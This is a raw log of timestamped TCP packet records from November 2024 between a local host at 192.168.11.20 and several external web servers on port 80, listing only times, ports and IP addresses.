                                                                                Nov 25, 2024 11:57:26.586169958 CET4974280192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 11:57:26.588319063 CET4974280192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 11:57:26.779201031 CET8049742195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 11:57:26.782552004 CET8049742195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 11:57:26.782737017 CET8049742195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 11:57:26.782948017 CET4974280192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 11:57:26.783751965 CET4974280192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 11:57:26.975222111 CET8049742195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 11:57:41.932332993 CET4974380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:42.029591084 CET8049743172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:42.029845953 CET4974380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:42.032996893 CET4974380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:42.130218983 CET8049743172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:42.266962051 CET8049743172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:42.267007113 CET8049743172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:42.267241001 CET4974380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:42.268316031 CET8049743172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:42.268520117 CET4974380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:43.545855045 CET4974380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:44.562035084 CET4974480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:44.659552097 CET8049744172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:44.659862995 CET4974480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:44.662894964 CET4974480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:44.760468006 CET8049744172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:44.894789934 CET8049744172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:44.894800901 CET8049744172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:44.895062923 CET4974480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:44.895164967 CET8049744172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:44.895304918 CET4974480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:46.170337915 CET4974480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:47.186479092 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:47.284204006 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.284440041 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:47.287607908 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:47.287688017 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:47.385339022 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.385395050 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.385454893 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.385499001 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.385529041 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.525825977 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.525876999 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.526010036 CET8049745172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:47.526021004 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:47.526200056 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:48.794817924 CET4974580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:49.811033010 CET4974680192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:49.908209085 CET8049746172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:49.908493042 CET4974680192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:49.910576105 CET4974680192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:50.007770061 CET8049746172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:50.160717010 CET8049746172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:50.160768032 CET8049746172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:50.160801888 CET8049746172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:50.161109924 CET4974680192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:50.161109924 CET4974680192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:50.161860943 CET4974680192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 11:57:50.259033918 CET8049746172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 11:57:55.283845901 CET4974780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:55.388176918 CET804974713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:55.388504028 CET4974780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:55.391695023 CET4974780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:55.495578051 CET804974713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:55.495630026 CET804974713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:55.495788097 CET4974780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:56.902271032 CET4974780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:57.005745888 CET804974713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:57.918720007 CET4974880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:58.023813963 CET804974813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:58.024063110 CET4974880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:58.027862072 CET4974880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:58.131753922 CET804974813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:58.131803989 CET804974813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:57:58.132050037 CET4974880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:59.542385101 CET4974880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:57:59.646169901 CET804974813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.559652090 CET4974980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:00.664791107 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.665059090 CET4974980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:00.668463945 CET4974980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:00.668545008 CET4974980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:00.772243023 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.772286892 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.772320032 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.772350073 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.772378922 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:00.772665024 CET804974913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:03.198512077 CET4975080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:03.303921938 CET804975013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:03.304275036 CET4975080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:03.306689978 CET4975080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:03.410573006 CET804975013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:03.411736965 CET804975013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:03.411784887 CET804975013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:03.411981106 CET4975080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:03.413475990 CET4975080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 11:58:03.517266035 CET804975013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 11:58:08.756257057 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:08.972493887 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:08.972789049 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:08.976408005 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.192620993 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222405910 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222474098 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222517967 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222704887 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.222728968 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222789049 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222836018 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.222995043 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.223057032 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.223179102 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223237991 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223351955 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223400116 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.223454952 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.223592043 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.438898087 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.438961029 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439074993 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439122915 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439194918 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439389944 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439409971 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439472914 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439603090 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439647913 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439694881 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439759016 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.439903021 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.439985037 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440128088 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440165997 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.440228939 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440426111 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.440530062 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440588951 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440818071 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.440921068 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.440982103 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441096067 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441142082 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441194057 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.441309929 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.441389084 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441447973 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.441643000 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.655459881 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655528069 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655572891 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655616999 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.655731916 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.655896902 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.655972004 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656053066 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656097889 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656224966 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656223059 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.656408072 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.656533957 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656593084 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656708956 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656757116 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.656831026 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.656965017 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657104015 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657159090 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657377005 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657465935 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657530069 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657577038 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657622099 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.657743931 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657805920 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.657953978 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658011913 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658128023 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658214092 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658269882 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.658423901 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:09.658471107 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658529043 CET804975131.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:09.658674002 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:10.477538109 CET4975180192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.493532896 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.707007885 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.707355976 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.713042974 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.926521063 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.965981007 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.965997934 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966222048 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.966289997 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966407061 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966506004 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966516972 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966581106 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.966734886 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.966800928 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.966815948 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.967081070 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:11.967093945 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.967108011 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:11.967273951 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.178956032 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.178973913 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179171085 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179184914 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179204941 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.179364920 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.179418087 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179529905 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179749012 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.179775000 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179840088 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.179898024 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180035114 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180073023 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180253029 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180295944 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180360079 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180547953 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180548906 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180680990 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180857897 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.180917025 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.180929899 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181171894 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181184053 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.181262016 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181512117 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.181525946 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181539059 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.181824923 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.392184973 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392256021 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392301083 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392344952 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392563105 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.392626047 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392688990 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392818928 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392864943 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.392968893 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393105984 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393182993 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393239975 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393385887 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393434048 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393465996 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393589973 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.393735886 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.393793106 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394030094 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.394033909 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394093990 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394208908 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394256115 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394371986 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.394433975 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.394539118 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394598007 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394711018 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394795895 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.394821882 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.395019054 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:12.395088911 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.395143032 CET804975231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:12.395349026 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:13.226857901 CET4975280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.242974997 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.458612919 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.458951950 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.463921070 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.679425955 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.679543972 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.679810047 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.680053949 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.680448055 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713517904 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713532925 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713658094 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713673115 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713887930 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.713887930 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.713984013 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.713996887 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.714247942 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.714329958 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.714468956 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.714653015 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.714709044 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.714759111 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.715018988 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.929260969 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.929327011 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.929373026 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.929418087 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.929534912 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.929692030 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.929692030 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.929792881 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.929944038 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.930449009 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.930507898 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.930552006 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.930596113 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.930754900 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.930808067 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.930814981 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.930861950 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.930907011 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931003094 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931057930 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.931114912 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931202888 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.931226015 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931448936 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.931552887 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931637049 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931718111 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931771040 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:14.931847095 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:14.932018995 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:15.145482063 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.145565987 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.145612955 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.145658016 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.145853996 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:15.145915031 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:15.145984888 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.146044970 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.146172047 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.146218061 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.146271944 CET4975380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 11:58:15.146306038 CET804975331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 11:58:15.146506071 CET4975380192.168.11.2031.31.196.177
